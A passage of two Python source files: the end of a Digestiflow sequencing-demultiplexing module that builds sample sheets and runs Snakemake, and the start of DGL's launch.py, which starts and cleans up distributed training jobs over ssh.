os.path.join(output_dir, "picard_barcodes/{}/samplesheet.txt".format(lane)), "w"
) as sf:
barcodewriter = csv.writer(bf, delimiter="\t")
sampleswriter = csv.writer(sf, delimiter="\t")
barcodewriter.writerow(head_barcodes)
sampleswriter.writerow(head_samplesheet)
for row in sorted(barcode_rows):
barcodewriter.writerow(list(map(str, row)))
for row in sorted(samples_rows):
sampleswriter.writerow(list(map(str, row)))
def reverse_complement(seq):
"""Return reverse-complemented version of ``seq``."""
mapping = {"A": "T", "a": "t", "C": "G", "c": "g", "G": "C", "g": "c", "T": "A", "t": "a"}
return "".join(reversed([mapping.get(i, i) for i in seq]))
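# For example (complement each base, then reverse the result):
#   reverse_complement("AACG") == "CGTT"
#   reverse_complement("acgN") == "Ncgt"   # unmapped characters pass through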
def load_run_info(path_run_info_xml):
"""Load information from ``RunInfo.xml`` file."""
with open(path_run_info_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls)
tag_run = root.find("Run")
return {
"run_id": tag_run.attrib["Id"],
"instrument": tag_run.find("Instrument").text,
"run_no": tag_run.attrib["Number"],
"flowcell": tag_run.find("Flowcell").text,
}
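# The parser above only reads a handful of fields; a RunInfo.xml of roughly
# this shape (values illustrative) would satisfy it:
#
#   <RunInfo>
#     <Run Id="200101_A00111_0042_BHXXXXXXX" Number="42">
#       <Flowcell>HXXXXXXX</Flowcell>
#       <Instrument>A00111</Instrument>
#     </Run>
#   </RunInfo>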
def load_run_parameters(path_run_parameters_xml):
"""Load information from ``runParameters.xml`` file."""
with open(path_run_parameters_xml, "rt") as xmlf:
xmls = xmlf.read()
root = ET.fromstring(xmls.lower())
version_string = next(root.iter("rtaversion")).text
if version_string.startswith("v"):
version_string = version_string[1:]
rta_version = tuple(map(int, version_string.split(".")))
return {"rta_version": rta_version}
def remove_old_samplesheets(output_dir):
"""Remove old sample sheets so that snakemake does not get confused."""
fls = ["SampleSheet.csv", "picard_barcodes", "illumina_basesmask"]
fls = [os.path.join(output_dir, f) for f in fls]
for f in fls:
if os.path.isdir(f):
shutil.rmtree(f)
elif os.path.exists(f):
os.remove(f)
def create_sample_sheet(config, input_dir, output_dir): # noqa: C901
"""Query the Digestiflow API for the necessary information for building the sample sheet."""
logging.info("Perform API queries and create sample sheet")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
logging.debug("Parsing RunInfo.xml file")
run_info = load_run_info(os.path.join(input_dir, "RunInfo.xml"))
path_run_info = glob.glob(os.path.join(input_dir, "?un?arameters.xml"))[0]
run_parameters = load_run_parameters(path_run_info)
logging.debug("RTA version is: %s", run_parameters["rta_version"])
logging.debug("Querying API for flow cell")
try:
flowcell = client.flowcell_resolve(
instrument_id=run_info["instrument"],
run_no=run_info["run_no"],
flowcell_id=run_info["flowcell"],
)
except ApiException as e:
raise ApiProblemException("Problem querying API for flow cell") from e
if flowcell is None:
logging.warning("Could not resolve flow cell via API. Not proceeding.")
return None
if flowcell["status_conversion"] != "ready" and not config.force_demultiplexing:
logging.warning('Status is not "ready", will skip flow cell.')
return None
if not flowcell["libraries"]:
logging.warning("There are no libraries in flow cell. I'm refusing to continue.")
return None
if not config.api_read_only:
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="in_progress")
except ApiException as e:
raise ApiProblemException('Could not update conversion status to "in_progress"') from e
logging.debug("Querying API for sequencing machine information")
try:
sequencer = client.sequencer_retrieve(sequencer=run_info["instrument"])
except ApiException as e:
raise ApiProblemException("Problem querying API for sequencer") from e
logging.debug("Querying for barcode information")
libraries = []
demux_reads_override = set()
for library in flowcell["libraries"]:
if not library["lane_numbers"]:
continue # do not consider library any further
if library.get("barcode_seq"):
barcode_seq = library.get("barcode_seq")
elif library.get("barcode"):
try:
barcode = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #1") from e
barcode_seq = barcode["sequence"]
else:
barcode_seq = ""
if library.get("barcode_seq2"):
barcode_seq2 = library.get("barcode_seq2")
elif library.get("barcode2"):
try:
barcode2 = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode2"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #2") from e
barcode_seq2 = barcode2["sequence"]
else:
barcode_seq2 = ""
if sequencer["dual_index_workflow"] == "B":
barcode_seq2 = reverse_complement(barcode_seq2)
if library["demux_reads"]:
demux_reads = library["demux_reads"]
else:
demux_reads = flowcell["demux_reads"] or flowcell["planned_reads"]
try:
demux_reads = return_bases_mask(flowcell["planned_reads"], demux_reads, "picard")
demux_reads_override.add(demux_reads)
except BaseMaskConfigException as e:
logging.warning("There is a problem with the bases mask. %s", e)
logging.exception(e, exc_info=True)
libraries.append(
{
"name": library["name"],
"reference": library["reference"],
"barcode": barcode_seq,
"barcode2": barcode_seq2,
"lanes": library["lane_numbers"],
"demux_reads_override": demux_reads,
}
)
# Get delivery type from flowcell information.
delivery_type = flowcell["delivery_type"].split("_")
# Normalize bases masks, decide if paired-end, find all custom bases_masks
planned_reads = flowcell["planned_reads"]
demux_reads = flowcell.get("demux_reads") or planned_reads
demux_reads = return_bases_mask(planned_reads, demux_reads, "picard")
flowcell["demux_reads"] = demux_reads # not used by bcl2fastq2
flowcell["demux_reads_override"] = list(sorted(demux_reads_override))
rta_version = run_parameters["rta_version"]
if "M" in flowcell["demux_reads"]: # TODO: refine condition
demux_tool = "picard"
elif config.demux_tool == "bcl2fastq" and rta_version >= (1, 18, 54):
demux_tool = "bcl2fastq2"
elif config.demux_tool == "bcl2fastq":
demux_tool = "bcl2fastq1"
else:
demux_tool = "picard"
logging.info("Using demux tool %s", demux_tool)
bcl2fastq2_params = {
"with_failed_reads": config.with_failed_reads,
"create_fastq_for_index_reads": flowcell["create_fastq_for_index_reads"],
"minimum_trimmed_read_length": flowcell["minimum_trimmed_read_length"],
"mask_short_adapter_reads": flowcell["mask_short_adapter_reads"],
}
logging.debug("Writing out demultiplexing configuration")
# Get barcode mismatch count or default.
if flowcell["barcode_mismatches"] is None:
if flowcell["rta_version"] == 1:
barcode_mismatches = 0
else:
barcode_mismatches = 1
else:
barcode_mismatches = flowcell["barcode_mismatches"]
with open(os.path.join(output_dir, "demux_config.json"), "wt") as jsonf:
config_json = {
"barcode_mismatches": barcode_mismatches,
"bcl2fastq2_params": bcl2fastq2_params,
"cores": config.cores,
"delivery_type": delivery_type,
"demux_tool": demux_tool,
"flowcell": {**flowcell, "libraries": libraries},
"input_dir": input_dir,
"lanes": config.lanes,
"output_dir": output_dir,
"rta_version": flowcell["rta_version"],
"tiles": config.tiles,
}
json.dump(config_json, jsonf)
logging.debug("Writing out sample sheet information")
remove_old_samplesheets(output_dir)
if demux_tool == "bcl2fastq1":
with open(os.path.join(output_dir, "SampleSheet.csv"), "wt") as csvf:
write_sample_sheet_v1(csv.writer(csvf), flowcell, libraries)
elif demux_tool == "picard":
write_sample_sheet_picard(flowcell, libraries, output_dir)
else:
write_sample_sheets_v2(flowcell, libraries, output_dir)
return flowcell # Everything is fine
def send_flowcell_success_message(client, flowcell, output_dir, *log_files):
if "seq" in flowcell["delivery_type"]:
# Remove log files that do not exist.
existing_log_files = [p for p in log_files if os.path.exists(p)]
missing_log_files = [p for p in log_files if not os.path.exists(p)]
        # Create renamed (and potentially compressed) copies of the files.
path_in = os.path.join(output_dir, "multiqc/multiqc_%s")
with tempfile.TemporaryDirectory() as tempdir:
path_out = os.path.join(tempdir, "MultiQC_%%s_%s.%%s" % flowcell["vendor_id"])
with open(path_in % "report.html", "rb") as f_in:
with gzip.open(path_out % ("Report", "html.gz"), "wb") as f_out:
shutil.copyfileobj(f_in, f_out)
shutil.copyfile(path_in % "data.zip", path_out % ("Data", "zip"))
# Post with renamed files.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(
flowcell=flowcell,
version=__version__,
missing_log_files="\n".join(missing_log_files) or "none; all found",
),
attachments=list(
itertools.chain(
[path_out % ("Report", "html.gz"), path_out % ("Data", "zip")],
existing_log_files,
)
),
)
else:
# No sequences generated, no MultiQC created.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(flowcell=flowcell, version=__version__),
attachments=list(log_files),
)
def send_flowcell_failure_message(client, flowcell, *log_files):
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing FAILED for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_FAILURE.format(flowcell=flowcell, version=__version__),
attachments=log_files,
)
def async_tee_pipe(process, input_file, out_file, out_file2, mutex):
"""Async tee-piping from input_file to two output files using the mutex."""
logging_thread = Thread(target=tee_pipe, args=(process, input_file, out_file, out_file2, mutex))
logging_thread.start()
return logging_thread
def tee_pipe(process, input_file, out_file, out_stream, mutex):
"""Tee-piping from input_file to two output files using the mutex."""
while 1:
line = input_file.readline()
if not line and process.poll() is not None:
break
else:
with mutex:
out_stream.write(line.decode("utf-8"))
out_file.write(line)
def launch_snakemake(config, flowcell, output_dir, work_dir):
"""Launch Snakemake and execute the demultiplexing"""
logging.info("Temporary directory is %s", work_dir)
logging.info("Start Snakemake workflow for demultiplexing")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
output_log_dir = os.path.join(output_dir, "log")
output_qc_dir = os.path.join(output_dir, "multiqc")
drmaa_log_dirs = [
os.path.join(output_log_dir, "digestiflow-demux-snakemake.log.gz"),
os.path.join(output_log_dir, "digestiflow-demux.log"),
]
if "seq" in flowcell["delivery_type"]:
drmaa_log_dirs += [
os.path.join(output_qc_dir, "multiqc_data.zip"),
os.path.join(output_qc_dir, "multiqc_report.html"),
]
if config.only_post_message:
for path in drmaa_log_dirs:
if not os.path.exists(path):
raise MissingOutputFile("Cannot post message with %s missing" % path)
    if config.only_post_message:
        logging.info("Only posting message, not running demultiplexing itself.")
        # Re-use the log file copied into the output directory by the previous
        # run so it can be attached to the message below.
        log_file_path = os.path.join(output_log_dir, "digestiflow-demux-snakemake.log.gz")
        failure = False
else:
argv = [
"--snakefile",
PATH_SNAKEFILE,
"--directory",
work_dir,
"--configfile",
os.path.join(output_dir, "demux_config.json"),
"--cores",
config.cores,
"--drmaa-log-dir",
output_log_dir,
"--max-jobs-per-second",
config.max_jobs_per_second,
"--use-conda",
"--config",
]
if config.jobscript:
argv += ["--jobscript", config.jobscript]
if config.verbose:
argv += ["--verbose", "--printshellcmds"]
if config.drmaa:
argv += ["--drmaa", config.drmaa]
if config.cluster_config:
argv += ["--cluster-config", config.cluster_config]
argv = list(map(str, argv))
logging.info("Executing: snakemake %s", " ".join(argv))
try:
# Launch Snakemake
proc = subprocess.Popen(
["snakemake"] + argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Write output to temporary log file, to be attached later.
log_file_path = os.path.join(config.log_path, "digestiflow-demux-snakemake.log.gz")
with gzip.open(log_file_path, "wb") as log_file:
mutex = Lock()
logger_stderr = async_tee_pipe(proc, proc.stderr, log_file, sys.stderr, mutex)
logger_stdout = async_tee_pipe(proc, proc.stdout, log_file, sys.stdout, mutex)
logger_stderr.join()
logger_stdout.join()
# Copy out log file to log directory.
os.makedirs(output_log_dir, exist_ok=True)
shutil.copy(log_file_path, output_log_dir)
failure = proc.returncode != 0
except WorkflowError as e:
logging.warning("Running demultiplexing failed: %s", e)
failure = True
# Paths to tarballs with Illumina HTML reports.
paths_html_reports = [
os.path.join(output_dir, "html_report_%s.tar.gz" % bases_mask)
for bases_mask in flowcell["demux_reads_override"]
]
if not failure and not config.api_read_only:
message = send_flowcell_success_message(
client, flowcell, output_dir, log_file_path, *paths_html_reports
)
logging.info("Marking flowcell as complete...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="complete")
except ApiException as e:
logging.warning("Could not update conversion state to complete via API: %s", e)
logging.info("Done running Snakemake.")
elif flowcell and not config.api_read_only:
message = send_flowcell_failure_message(client, flowcell, log_file_path)
logging.info("Marking flowcell as failed...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="failed")
except ApiException as e:
logging.warning("Could not update conversion state to failed via API: %s", e)
else:
message = None
return (not failure, message, flowcell, client)
def perform_demultiplexing(config, input_dir, output_dir):
"""Prepare and execute the demultiplexing with the Snakemake workflow."""
logging.info("Starting to process input directory %s", input_dir)
logging.info("Output will go to %s", output_dir)
logging.debug("Creating output directory %s", output_dir)
os.makedirs(output_dir, exist_ok=True)
flowcell = create_sample_sheet(config, input_dir, output_dir)
if not flowcell:
return False, None, None, None
if config.work_dir:
logging.info("Using work directory %s", config.work_dir)
return launch_snakemake(config, flowcell, output_dir, config.work_dir)
elif config.keep_work_dir:
logging.info("Setup non-temporary work directory")
return launch_snakemake(config, flowcell, output_dir, tempfile.mkdtemp("-cubi-demux"))
else:
logging.info("Setup temporary work directory")
with tempfile.TemporaryDirectory("-cubi-demux") as work_dir:
return launch_snakemake(config, flowcell, output_dir, work_dir)
|
launch.py
|
"""Launching tool for DGL distributed training"""
import os
import stat
import sys
import subprocess
import argparse
import signal
import logging
import time
import json
import multiprocessing
import re
from functools import partial
from threading import Thread
from typing import Optional
DEFAULT_PORT = 30050
def cleanup_proc(get_all_remote_pids, conn):
'''This process tries to clean up the remote training tasks.
'''
    print('cleanup process runs')
# This process should not handle SIGINT.
signal.signal(signal.SIGINT, signal.SIG_IGN)
data = conn.recv()
# If the launch process exits normally, this process doesn't need to do anything.
if data == 'exit':
sys.exit(0)
else:
remote_pids = get_all_remote_pids()
# Otherwise, we need to ssh to each machine and kill the training jobs.
for (ip, port), pids in remote_pids.items():
kill_process(ip, port, pids)
print('cleanup process exits')
def kill_process(ip, port, pids):
'''ssh to a remote machine and kill the specified processes.
'''
curr_pid = os.getpid()
killed_pids = []
# If we kill child processes first, the parent process may create more again. This happens
# to Python's process pool. After sorting, we always kill parent processes first.
pids.sort()
for pid in pids:
assert curr_pid != pid
print('kill process {} on {}:{}'.format(pid, ip, port), flush=True)
kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill {}\''.format(pid)
subprocess.run(kill_cmd, shell=True)
killed_pids.append(pid)
# It's possible that some of the processes are not killed. Let's try again.
for i in range(3):
killed_pids = get_killed_pids(ip, port, killed_pids)
if len(killed_pids) == 0:
break
else:
killed_pids.sort()
for pid in killed_pids:
print('kill process {} on {}:{}'.format(pid, ip, port), flush=True)
kill_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'kill -9 {}\''.format(pid)
subprocess.run(kill_cmd, shell=True)
def get_killed_pids(ip, port, killed_pids):
'''Get the process IDs that we want to kill but are still alive.
'''
killed_pids = [str(pid) for pid in killed_pids]
killed_pids = ','.join(killed_pids)
ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -p {} -h\''.format(killed_pids)
res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE)
pids = []
for p in res.stdout.decode('utf-8').split('\n'):
l = p.split()
if len(l) > 0:
pids.append(int(l[0]))
return pids
def execute_remote(
cmd: str,
ip: str,
port: int,
username: Optional[str] = ""
) -> Thread:
"""Execute command line on remote machine via ssh.
Args:
cmd: User-defined command (udf) to execute on the remote host.
ip: The ip-address of the host to run the command on.
port: Port number that the host is listening on.
username: Optional. If given, this will specify a username to use when issuing commands over SSH.
Useful when your infra requires you to explicitly specify a username to avoid permission issues.
Returns:
thread: The Thread whose run() is to run the `cmd` on the remote host. Returns when the cmd completes
on the remote host.
"""
ip_prefix = ""
if username:
ip_prefix += "{username}@".format(username=username)
# Construct ssh command that executes `cmd` on the remote host
ssh_cmd = "ssh -o StrictHostKeyChecking=no -p {port} {ip_prefix}{ip} '{cmd}'".format(
port=str(port),
ip_prefix=ip_prefix,
ip=ip,
cmd=cmd,
)
# thread func to run the job
def run(ssh_cmd):
subprocess.check_call(ssh_cmd, shell=True)
thread = Thread(target=run, args=(ssh_cmd,))
    thread.daemon = True
thread.start()
return thread
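# For example (values illustrative), execute_remote("ls /data", "1.2.3.4", 22,
# username="alice") starts a daemon thread running:
#   ssh -o StrictHostKeyChecking=no -p 22 alice@1.2.3.4 'ls /data'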
def get_remote_pids(ip, port, cmd_regex):
"""Get the process IDs that run the command in the remote machine.
"""
pids = []
curr_pid = os.getpid()
# Here we want to get the python processes. We may get some ssh processes, so we should filter them out.
ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'ps -aux | grep python | grep -v StrictHostKeyChecking\''
res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE)
for p in res.stdout.decode('utf-8').split('\n'):
l = p.split()
if len(l) < 2:
continue
# We only get the processes that run the specified command.
res = re.search(cmd_regex, p)
if res is not None and int(l[1]) != curr_pid:
pids.append(l[1])
pid_str = ','.join([str(pid) for pid in pids])
ps_cmd = 'ssh -o StrictHostKeyChecking=no -p ' + str(port) + ' ' + ip + ' \'pgrep -P {}\''.format(pid_str)
res = subprocess.run(ps_cmd, shell=True, stdout=subprocess.PIPE)
pids1 = res.stdout.decode('utf-8').split('\n')
all_pids = []
for pid in set(pids + pids1):
if pid == '' or int(pid) == curr_pid:
continue
all_pids.append(int(pid))
all_pids.sort()
return all_pids
def get_all_remote_pids(hosts, ssh_port, udf_command):
'''Get all remote processes.
'''
remote_pids = {}
for node_id, host in enumerate(hosts):
ip, _ = host
# When creating training processes in remote machines, we may insert some arguments
# in the commands. We need to use regular expressions to match the modified command.
cmds = udf_command.split()
new_udf_command = ' .*'.join(cmds)
pids = get_remote_pids(ip, ssh_port, new_udf_command)
remote_pids[(ip, ssh_port)] = pids
return remote_pids
def construct_torch_dist_launcher_cmd(
num_trainers: int,
num_nodes: int,
node_rank: int,
master_addr: str,
master_port: int
) -> str:
"""Constructs the torch distributed launcher command.
Helper function.
Args:
num_trainers:
num_nodes:
node_rank:
master_addr:
master_port:
Returns:
cmd_str.
"""
torch_cmd_template = "-m torch.distributed.launch " \
"--nproc_per_node={nproc_per_node} " \
"--nnodes={nnodes} " \
"--node_rank={node_rank} " \
"--master_addr={master_addr} " \
"--master_port={master_port}"
return torch_cmd_template.format(
nproc_per_node=num_trainers,
nnodes=num_nodes,
node_rank=node_rank,
master_addr=master_addr,
master_port=master_port
)
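# For instance, construct_torch_dist_launcher_cmd(num_trainers=4, num_nodes=2,
# node_rank=0, master_addr="1.2.3.4", master_port=1234) returns:
#   "-m torch.distributed.launch --nproc_per_node=4 --nnodes=2 --node_rank=0 "
#   "--master_addr=1.2.3.4 --master_port=1234"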
def wrap_udf_in_torch_dist_launcher(
udf_command: str,
num_trainers: int,
num_nodes: int,
node_rank: int,
master_addr: str,
master_port: int,
) -> str:
"""Wraps the user-defined function (udf_command) with the torch.distributed.launch module.
    Example: if udf_command is "python3 run/some/trainer.py arg1 arg2", then new_udf_command becomes:
        "python3 -m torch.distributed.launch <TORCH DIST ARGS> run/some/trainer.py arg1 arg2"
udf_command is assumed to consist of pre-commands (optional) followed by the python launcher script (required):
Examples:
# simple
python3.7 path/to/some/trainer.py arg1 arg2
# multi-commands
(cd some/dir && python3.7 path/to/some/trainer.py arg1 arg2)
IMPORTANT: If udf_command consists of multiple python commands, then this will result in undefined behavior.
Args:
udf_command:
num_trainers:
num_nodes:
node_rank:
master_addr:
master_port:
Returns:
"""
torch_dist_cmd = construct_torch_dist_launcher_cmd(
num_trainers=num_trainers,
num_nodes=num_nodes,
node_rank=node_rank,
master_addr=master_addr,
master_port=master_port
)
# Auto-detect the python binary that kicks off the distributed trainer code.
# Note: This allowlist order matters, this will match with the FIRST matching entry. Thus, please add names to this
# from most-specific to least-specific order eg:
# (python3.7, python3.8) -> (python3)
# The allowed python versions are from this: https://www.dgl.ai/pages/start.html
python_bin_allowlist = (
"python3.6", "python3.7", "python3.8", "python3.9", "python3",
# for backwards compatibility, accept python2 but technically DGL is a py3 library, so this is not recommended
"python2.7", "python2",
)
# If none of the candidate python bins match, then we go with the default `python`
python_bin = "python"
for candidate_python_bin in python_bin_allowlist:
if candidate_python_bin in udf_command:
python_bin = candidate_python_bin
break
# transforms the udf_command from:
# python path/to/dist_trainer.py arg0 arg1
# to:
# python -m torch.distributed.launch [DIST TORCH ARGS] path/to/dist_trainer.py arg0 arg1
# Note: if there are multiple python commands in `udf_command`, this may do the Wrong Thing, eg launch each
# python command within the torch distributed launcher.
new_udf_command = udf_command.replace(python_bin, f"{python_bin} {torch_dist_cmd}")
return new_udf_command
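# Sketch of the resulting rewrite (torch args abbreviated):
#   "python3 train.py --epochs 5"
#     -> "python3 -m torch.distributed.launch <DIST ARGS> train.py --epochs 5"
# Note that str.replace rewrites every occurrence of the detected python
# binary, hence the docstring caveat about commands containing multiple
# python invocations.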
def construct_dgl_server_env_vars(
num_samplers: int,
num_server_threads: int,
tot_num_clients: int,
part_config: str,
ip_config: str,
num_servers: int,
graph_format: str,
pythonpath: Optional[str] = "",
) -> str:
"""Constructs the DGL server-specific env vars string that are required for DGL code to behave in the correct
server role.
Convenience function.
Args:
num_samplers:
num_server_threads:
tot_num_clients:
part_config: Partition config.
Relative path to workspace.
ip_config: IP config file containing IP addresses of cluster hosts.
Relative path to workspace.
num_servers:
graph_format:
pythonpath: Optional. If given, this will pass this as PYTHONPATH.
Returns:
server_env_vars: The server-specific env-vars in a string format, friendly for CLI execution.
"""
server_env_vars_template = (
"DGL_ROLE={DGL_ROLE} "
"DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} "
"OMP_NUM_THREADS={OMP_NUM_THREADS} "
"DGL_NUM_CLIENT={DGL_NUM_CLIENT} "
"DGL_CONF_PATH={DGL_CONF_PATH} "
"DGL_IP_CONFIG={DGL_IP_CONFIG} "
"DGL_NUM_SERVER={DGL_NUM_SERVER} "
"DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} "
"{suffix_optional_envvars}"
)
suffix_optional_envvars = ""
if pythonpath:
suffix_optional_envvars += f"PYTHONPATH={pythonpath} "
return server_env_vars_template.format(
DGL_ROLE="server",
DGL_NUM_SAMPLER=num_samplers,
OMP_NUM_THREADS=num_server_threads,
DGL_NUM_CLIENT=tot_num_clients,
DGL_CONF_PATH=part_config,
DGL_IP_CONFIG=ip_config,
DGL_NUM_SERVER=num_servers,
DGL_GRAPH_FORMAT=graph_format,
suffix_optional_envvars=suffix_optional_envvars,
)
def construct_dgl_client_env_vars(
num_samplers: int,
tot_num_clients: int,
part_config: str,
ip_config: str,
num_servers: int,
graph_format: str,
num_omp_threads: int,
pythonpath: Optional[str] = "",
) -> str:
"""Constructs the DGL client-specific env vars string that are required for DGL code to behave in the correct
client role.
Convenience function.
Args:
num_samplers:
tot_num_clients:
part_config: Partition config.
Relative path to workspace.
ip_config: IP config file containing IP addresses of cluster hosts.
Relative path to workspace.
num_servers:
graph_format:
num_omp_threads:
pythonpath: Optional. If given, this will pass this as PYTHONPATH.
Returns:
client_env_vars: The client-specific env-vars in a string format, friendly for CLI execution.
"""
client_env_vars_template = (
"DGL_DIST_MODE={DGL_DIST_MODE} "
"DGL_ROLE={DGL_ROLE} "
"DGL_NUM_SAMPLER={DGL_NUM_SAMPLER} "
"DGL_NUM_CLIENT={DGL_NUM_CLIENT} "
"DGL_CONF_PATH={DGL_CONF_PATH} "
"DGL_IP_CONFIG={DGL_IP_CONFIG} "
"DGL_NUM_SERVER={DGL_NUM_SERVER} "
"DGL_GRAPH_FORMAT={DGL_GRAPH_FORMAT} "
"OMP_NUM_THREADS={OMP_NUM_THREADS} "
"{suffix_optional_envvars}"
)
# append optional additional env-vars
suffix_optional_envvars = ""
if pythonpath:
suffix_optional_envvars += f"PYTHONPATH={pythonpath} "
return client_env_vars_template.format(
DGL_DIST_MODE="distributed",
DGL_ROLE="client",
DGL_NUM_SAMPLER=num_samplers,
DGL_NUM_CLIENT=tot_num_clients,
DGL_CONF_PATH=part_config,
DGL_IP_CONFIG=ip_config,
DGL_NUM_SERVER=num_servers,
DGL_GRAPH_FORMAT=graph_format,
OMP_NUM_THREADS=num_omp_threads,
suffix_optional_envvars=suffix_optional_envvars,
)
def wrap_cmd_with_local_envvars(cmd: str, env_vars: str) -> str:
"""Wraps a CLI command with desired env vars with the following properties:
(1) env vars persist for the entire `cmd`, even if it consists of multiple "chained" commands like:
cmd = "ls && pwd && python run/something.py"
(2) env vars don't pollute the environment after `cmd` completes.
Example:
>>> cmd = "ls && pwd"
>>> env_vars = "VAR1=value1 VAR2=value2"
>>> wrap_cmd_with_local_envvars(cmd, env_vars)
"(export VAR1=value1 VAR2=value2; ls && pwd)"
Args:
cmd:
env_vars: A string containing env vars, eg "VAR1=val1 VAR2=val2"
Returns:
cmd_with_env_vars:
"""
# use `export` to persist env vars for entire cmd block. required if udf_command is a chain of commands
# also: wrap in parens to not pollute env:
# https://stackoverflow.com/a/45993803
return f"(export {env_vars}; {cmd})"
def wrap_cmd_with_extra_envvars(cmd: str, env_vars: list) -> str:
"""Wraps a CLI command with extra env vars
Example:
>>> cmd = "ls && pwd"
>>> env_vars = ["VAR1=value1", "VAR2=value2"]
>>> wrap_cmd_with_extra_envvars(cmd, env_vars)
"(export VAR1=value1 VAR2=value2; ls && pwd)"
Args:
cmd:
env_vars: A list of strings containing env vars, e.g., ["VAR1=value1", "VAR2=value2"]
Returns:
cmd_with_env_vars:
"""
env_vars = " ".join(env_vars)
return wrap_cmd_with_local_envvars(cmd, env_vars)
def submit_jobs(args, udf_command):
"""Submit distributed jobs (server and client processes) via ssh"""
hosts = []
thread_list = []
server_count_per_machine = 0
# Get the IP addresses of the cluster.
ip_config = os.path.join(args.workspace, args.ip_config)
with open(ip_config) as f:
for line in f:
result = line.strip().split()
if len(result) == 2:
ip = result[0]
port = int(result[1])
hosts.append((ip, port))
elif len(result) == 1:
ip = result[0]
port = DEFAULT_PORT
hosts.append((ip, port))
else:
raise RuntimeError("Format error of ip_config.")
server_count_per_machine = args.num_servers
# Get partition info of the graph data
part_config = os.path.join(args.workspace, args.part_config)
with open(part_config) as conf_f:
part_metadata = json.load(conf_f)
assert 'num_parts' in part_metadata, 'num_parts does not exist.'
# The number of partitions must match the number of machines in the cluster.
assert part_metadata['num_parts'] == len(hosts), \
'The number of graph partitions has to match the number of machines in the cluster.'
tot_num_clients = args.num_trainers * (1 + args.num_samplers) * len(hosts)
# launch server tasks
server_env_vars = construct_dgl_server_env_vars(
num_samplers=args.num_samplers,
num_server_threads=args.num_server_threads,
tot_num_clients=tot_num_clients,
part_config=args.part_config,
ip_config=args.ip_config,
num_servers=args.num_servers,
graph_format=args.graph_format,
pythonpath=os.environ.get("PYTHONPATH", ""),
)
for i in range(len(hosts) * server_count_per_machine):
ip, _ = hosts[int(i / server_count_per_machine)]
server_env_vars_cur = f"{server_env_vars} DGL_SERVER_ID={i}"
cmd = wrap_cmd_with_local_envvars(udf_command, server_env_vars_cur)
cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd
cmd = 'cd ' + str(args.workspace) + '; ' + cmd
thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username))
# launch client tasks
client_env_vars = construct_dgl_client_env_vars(
num_samplers=args.num_samplers,
tot_num_clients=tot_num_clients,
part_config=args.part_config,
ip_config=args.ip_config,
num_servers=args.num_servers,
graph_format=args.graph_format,
num_omp_threads=os.environ.get("OMP_NUM_THREADS", str(args.num_omp_threads)),
pythonpath=os.environ.get("PYTHONPATH", ""),
)
for node_id, host in enumerate(hosts):
ip, _ = host
# Transform udf_command to follow torch's dist launcher format: `PYTHON_BIN -m torch.distributed.launch ... UDF`
torch_dist_udf_command = wrap_udf_in_torch_dist_launcher(
udf_command=udf_command,
num_trainers=args.num_trainers,
num_nodes=len(hosts),
node_rank=node_id,
master_addr=hosts[0][0],
master_port=1234,
)
cmd = wrap_cmd_with_local_envvars(torch_dist_udf_command, client_env_vars)
cmd = wrap_cmd_with_extra_envvars(cmd, args.extra_envs) if len(args.extra_envs) > 0 else cmd
cmd = 'cd ' + str(args.workspace) + '; ' + cmd
thread_list.append(execute_remote(cmd, ip, args.ssh_port, username=args.ssh_username))
# Start a cleanup process dedicated for cleaning up remote training jobs.
conn1,conn2 = multiprocessing.Pipe()
func = partial(get_all_remote_pids, hosts, args.ssh_port, udf_command)
process = multiprocessing.Process(target=cleanup_proc, args=(func, conn1))
process.start()
def signal_handler(signal, frame):
logging.info('Stop launcher')
# We need to tell the cleanup process to kill remote training jobs.
conn2.send('cleanup')
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
for thread in thread_list:
thread.join()
# The training processes complete. We should tell the cleanup process to exit.
conn2.send('exit')
process.join()
def main():
print("hello")
parser = argparse.ArgumentParser(description='Launch a distributed job')
parser.add_argument('--ssh_port', type=int, default=22, help='SSH Port.')
parser.add_argument(
"--ssh_username", default="",
help="Optional. When issuing commands (via ssh) to cluster, use the provided username in the ssh cmd. "
"Example: If you provide --ssh_username=bob, then the ssh command will be like: 'ssh bob@1.2.3.4 CMD' "
"instead of 'ssh 1.2.3.4 CMD'"
)
parser.add_argument('--workspace', type=str,
help='Path of user directory of distributed tasks. \
This is used to specify a destination location where \
the contents of current directory will be rsyncd')
parser.add_argument('--num_trainers', type=int,
help='The number of trainer processes per machine')
parser.add_argument('--num_omp_threads', type=int,
help='The number of OMP threads per trainer')
parser.add_argument('--num_samplers', type=int, default=0,
help='The number of sampler processes per trainer process')
parser.add_argument('--num_servers', type=int,
help='The number of server processes per machine')
parser.add_argument('--part_config', type=str,
